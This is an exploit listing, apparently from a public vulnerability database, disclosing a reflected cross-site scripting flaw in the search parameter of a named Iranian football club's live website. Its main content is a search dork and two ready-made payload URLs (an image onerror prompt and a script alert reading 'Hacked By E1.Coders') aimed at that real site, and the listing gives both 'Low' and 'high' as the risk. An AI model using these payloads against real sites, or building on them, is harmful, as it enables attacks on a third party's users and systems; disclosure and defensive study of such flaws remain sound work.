Esteghlal F.C. Cross Site Scripting

2024.05.13
Credit: E1.Coders
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Site https://fcesteghlal.ir suffers from a remote XSS vulnerability. This security incident was reported by the SOC and Maher team and prevention centers and was ignored this site has not responded to their reports so we are posting this to add visibility to the issue. ################################################################################################### # # # Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability. # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : https://fcesteghlal.ir/ # # # # Security Risk : high # # # # Description : All sites coded and designed by novinvision # # # # DorK : fcesteghlal.ir/search?term= # # # ################################################################################################### # # # Expl0iTs: https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)> # # https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top